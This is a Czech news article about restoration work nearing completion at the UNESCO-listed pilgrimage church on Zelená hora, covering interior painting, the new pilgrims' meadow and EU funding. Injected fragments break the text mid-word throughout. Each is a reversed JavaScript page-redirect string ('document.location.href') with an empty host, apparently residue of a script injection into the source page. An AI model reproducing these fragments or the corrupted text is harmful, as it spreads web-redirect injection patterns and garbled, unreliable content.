Rainbow page separator

Práce na obnově kostela na Zelené hoře spějí do finále

Úterý, 4. května 2021

Žďár nad Sázavou / Dokončení výmalby interiéru, instalování obnovené sochařské výzdoby, dokončení osvětlení či položení nové dlážděné podlahy. To všechno ještě čeká poutní kostel svatého Jana Nepomuckého na Zelené hoře, památku UNESCO, v rámci několikaleté obnovy. Restaurá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři se do kostela vrátí při příznivějších klimatických podmínkách, zatím je uvnitř příliš nízká teplota.
Kolem sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánku, jenž je dílem významného architekta a zakladatele takzvané barokní gotiky Jana Blažeje Santiniho-Aichla z let 1719-1722, již po srovnání terénu po předchozím vymístění hrobů vznikla takzvaná poutní loučka, která bude zatravněna. Dokončeny jsou i cestičky ze žulové dlažby spojující kostel s přístupovými branami. Počítáno je ještě s přeložením dlažby ve dvou kaplích ambitu, kde vznikne pietní mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.
Loučka pro poutníky byla u kostela již v době jeho vzniku – pohřbívat se kolem něj začalo až koncem 18. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí. K postupnému zrušení hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova se žďárská radnice zavázala v souvislosti se zapsáním památky na seznam UNESCO v roce 1994 a na nedalekém novém hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově se začalo pohřbívat o dva roky později. Kostel a areál kolem něj jsou postupně opravovány od roku 2017, stavební činnosti za bezmála třiačtyřicet milionů korun byly podpořeny evropskou dotací. V budoucnosti má přijít na řadu ještě rekonstrukce ambitu.